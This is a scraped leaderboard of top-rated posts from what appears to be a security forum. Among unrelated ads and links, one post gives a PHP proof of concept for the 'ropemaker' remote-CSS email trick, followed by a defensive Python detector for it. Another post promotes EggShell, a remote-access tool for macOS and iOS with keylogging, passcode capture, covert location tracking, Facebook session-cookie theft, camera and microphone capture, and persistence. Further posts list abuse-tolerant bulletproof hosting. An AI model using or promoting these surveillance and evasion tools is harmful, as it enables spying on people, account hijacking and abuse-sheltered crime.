Leaderboard
Popular Content
Showing content with the highest reputation on 08/25/17 in all areas
-
https://www.it-sec-catalog.info/

Available from https://it-sec-catalog.info/ and https://www.gitbook.com/book/arthurgerkis/it-sec-catalog.

About this project

This is a catalog of links to articles on computer security — software and hardware analysis and vulnerability exploitation, shellcode development and security mitigations, including computer security research, and malware stuff. Slides are not included (there is another project for that). Advisories without much detail are also not included. All articles are only in English. The project has been running since 2010.

Author and contributors

Author of this project: Arthur (ax330d) Gerkis; contributors: Nitay Artenstein, Joe (j0echip) Chip. Thanks to everyone who helped with the project.

7 points
-
Put more information on the site: what type of ads you sell (popups, banners (+ dimensions)), why we should use your site (e.g. we pay very quickly, the payment methods), a privacy policy on the front page in the footer (see internal links), and say on the front page that the revshare is 90%. Also, the text you have now looks copied. My opinion: you are a network that sells ads but doesn't know how to sell itself.

2 points
-
DeLux Edition: Getting root privileges on the eLux Thin Client OS

Designed as a secure, streamlined environment for users to access applications such as a browser, Citrix and terminal services, the vendor describes eLux as: “… a hardware-independent operating system for cloud computing environments. It is based on a write protected file system and therefore secure against computer viruses and other malware without using special Antivirus Software. eLux® has been continuously developed and enhanced for more than 15 years.”

Source: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/delux-edition-getting-root-privileges-on-the-elux-thin-client-os/

2 points
-
Web Development

Web languages: PHP, Javascript
Design: Bootstrap
Template engine: Smarty
Editing/Fixing/Optimization: Wordpress
Framework for scrapers: Simple HTML Dom

Information
- I accept both long-term and short-term projects.
- For any project, all the details will be agreed with the client at the start; new features cannot be added during the project (only small changes).
- Support is entirely FREE. By support I mean: installation, bug fixing, MySQL fixes, etc.
- Prices will be set according to the time the project requires and its complexity.
- I also accept jobs where I receive a monthly salary.
- I also accept jobs where I am paid by the hour.

Portfolio:
- I offer a live preview of projects in private or via TeamViewer (I am not allowed to share the companies' links, but I can show pictures).

Payment
- BitCoin/Ethereum
- PayPal
- Bank transfer
- Paysafe

Contact
- ICQ: CURRENTLY UNAVAILABLE
- Telegram: @adicode
- Skype: adicode32@outlook.com
- Jabber: adicode@404.city

**Please don't leave messages like "I've added you", "how much would it cost me?", "can you do this?" in the topic. I welcome any question by PM or on one of the networks above. Thank you.

1 point
-
Table of Contents

Visual/Mechanical Inspection
• Service Eligibility
• Swollen Battery
• Display Modification
• Liquid Contact
• Debris or Corrosion
• Enclosure Wear
iPhone 6 Hardware Overview
iPhone 6 Plus Hardware Overview
iPhone 6s Hardware Overview
iPhone 6s Plus Hardware Overview
iPhone 7 Hardware Overview
iPhone 7 Plus Hardware Overview
Service Eligibility Guidelines
Model Numbers and Configuration Codes

Download: https://www.dropbox.com/s/igvowila1q317ys/070-00167-I_EN.pdf?dl=0

1 point
-
Do you have a site to propose to me, or are you just butting in? I said clearly that the amount is negotiable depending on the site; the amount can go up or down. As an average I chose 100, and so that the title wouldn't be too long I said I'm offering 100. All OK?

1 point
-
They generally reply within a month at most. Leave the phone number here and someone will crack it for you.

1 point
-
It also works on Gmail, but not with the CSS parameters.

1 point
-
Scum. I hope he writhes in agony. @aelius - it seems those people aren't interested, burn the scumbag.

1 point
-
I've been playing with ropemaker for the last few hours and I can say it is nothing special. POC:

```php
<?php
$to = "destinatar@site.tld";
$subject = "ropemaker vulnerability";
// HTML body: the <style> block pulls its rules from an external stylesheet
$message = <<<START
<html>
<head>
<style type="text/css">@import "http://link_catre_extern/style.css"</style>
</head>
<body>
I heard you are a <span id="content"></span> boy
</body>
</html>
START;
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-Transfer-Encoding: quoted-printable\r\nContent-Type: text/html; charset=UTF-8\r\n";
mail($to, $subject, $message, $headers);
```

In the CSS file we have this:

```css
#content:after { content:"good"; }
```

After the mail has been sent, the CSS file can be modified to add something else (e.g. bad). From my point of view, the vulnerability is only a problem on the side of the programmers who built the applications and don't know how to ban the import of external CSS files. There are very few applications that don't block stylesheets (the vulnerability only worked for me on Outlook on Android), so in a month or two we should have security updates for them and ropemaker should be a thing of the past.

1 point
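For the mail-gateway side of the issue described in the post above, the following is an added example (not part of the original post) that flags HTML bodies whose rendering depends on a stylesheet hosted outside the message. It goes slightly beyond the PoC by also covering `<link rel="stylesheet">`; the function name, class name and the `example.invalid` hosts are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Matches @import "http://…", @import 'https://…' and @import url(//host/x.css)
IMPORT_RE = re.compile(
    r"""@import\s+(?:url\(\s*)?["']?((?:https?:)?//[^"')\s;]+)""", re.I)
REMOTE_RE = re.compile(r"^(?:https?:)?//", re.I)


class RemoteCssFinder(HTMLParser):
    """Collect references to stylesheets hosted outside the message."""

    def __init__(self):
        super().__init__()
        self.in_style = False
        self.findings = []  # list of (vector, url)

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "style":
            self.in_style = True
        elif tag == "link":
            rel = attrs.get("rel", "").lower().split()
            href = attrs.get("href", "").strip()
            if "stylesheet" in rel and REMOTE_RE.match(href):
                self.findings.append(("link", href))

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        # Only text inside <style> is CSS; body text is ignored.
        if self.in_style:
            for m in IMPORT_RE.finditer(data):
                self.findings.append(("@import", m.group(1)))


def find_remote_css(html_body):
    """Return [(vector, url), ...] for every remote stylesheet reference."""
    finder = RemoteCssFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings


# Constructed sample: same structure as the PoC body, placeholder host.
SAMPLE = """<html><head>
<style type="text/css">@import "http://css.example.invalid/style.css"</style>
</head><body>I heard you are a <span id="content"></span> boy</body></html>"""

if __name__ == "__main__":
    for vector, url in find_remote_css(SAMPLE):
        print(f"remote CSS via {vector}: {url}")
```

A non-empty result means the visible text of the message can change after delivery, so a filter can quarantine the mail or strip the reference before it reaches the client.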
-
Brief Overview

EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploit's “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload that spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES

Encrypted Communication

All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started.

Getting Started

To use EggShell, you must have pycrypto and Python 2.7.x installed

Install using git: (macOS/Linux)

```
git clone https://github.com/neoneggplant/EggShell
cd EggShell
python eggshell.py
```

Create And Run A Payload

Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary.

Example: running the created payload on our target

Back on our server, we can see we received a connection and an eggshell session has been started!

macOS Commands

ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence

iOS Commands

sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon – tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device

EggShellPro Commands (Cydia Substrate Extension)

lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successful passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice: turn on or off location services

EggShell Pro

EggShell Pro is a Cydia substrate library that takes advantage of the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring.

Navigating/Downloading Files

EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine.

Taking Pictures

Taking a photo with the “picture” command on macOS will activate the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam”

iOS Location Tracking Even With Location Services Off

EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps.

iOS Getting Passcode

EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device.

macOS Hijacking Safari Facebook Sessions

With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser.

macOS Persistence

To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab.

Recording Audio

Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data.

Handling Multiple Sessions

With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices. As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console

Payloads In Apps

Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS

Immediately after running the app, our payload is run and just as expected, we have a connection

Safari Exploit + EggShell

Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro

Original Video

Thanks For Viewing

lucasjackson5815@gmail.com

Download: EggShell-master.zip

Source: http://lucasjackson.me/index.php/eggshell/

1 point
-
Depends on what you want to do. There are dedicated servers and VPSes in Iran with bitcoin payment, traffic routed through Russia, and in the T&Cs they have only prohibited DDoS, malware, spam and child porn.

1 point
-
Anonymous domain registration:
https://njal.la/ for domains; others:
http://www.gandi.net
http://nic.ru
http://prq.se

Hosting:
https://masterhost.ru/
http://abusehosting.net/
http://www.2x4.ru/index.php
https://www.shinjiru.com/
https://sweb.ru/
http://zservers.ru/
https://jino.ru/

I recommend sollhost:
Sales Jabber: webhost@jabberim.org hostmgr@pubchat.im
Jabber: sollhost@jabbix.ru

An interesting read: https://www.informatics.indiana.edu/xw7/papers/alrwais2017under.pdf

1 point